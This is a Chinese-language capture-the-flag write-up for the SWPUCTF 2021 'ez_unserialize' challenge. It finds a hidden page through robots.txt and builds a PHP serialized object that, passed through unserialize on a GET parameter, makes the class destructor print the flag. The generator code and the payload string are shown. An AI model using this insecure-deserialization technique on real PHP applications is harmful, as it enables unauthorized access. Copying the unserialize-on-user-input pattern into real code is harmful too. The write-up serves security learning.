[SWPUCTF 2021 新生赛]ez_unserialize

打开网站未发现有啥可用的线索

对网站直接扫描

得到一个robots.txt目录
robots协议：爬虫协议，没有强制执行力
直接访问目录
得到提示

User-agent: *
Disallow: /cl45s.php

跟进发现是php反序列化应用

根据代码构造php序列化对象

<?php
  error_reporting(0);
show_source("cl45s.php");

class wllm{

  public $admin;
  public $passwd;

  public function __construct(){
    $this->admin ="user";
    $this->passwd = "123456";
  }

  public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "ctf"){
      include("flag.php");
      echo $flag;
    }else{
      echo $this->admin;
      echo $this->passwd;
      echo "Just a bit more!";
    }
  }
}
$a=new wllm();
$a->admin = "admin";
$a->passwd = "ctf";
$s=serialize($a);
echo $s.'<br>';
// $p = $_GET['p'];
$p=$s;
unserialize($p);
echo '<br>'.$p.'<br>';
?>

运行得到结果：

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

将结果直接通过get请求提交即可得到flag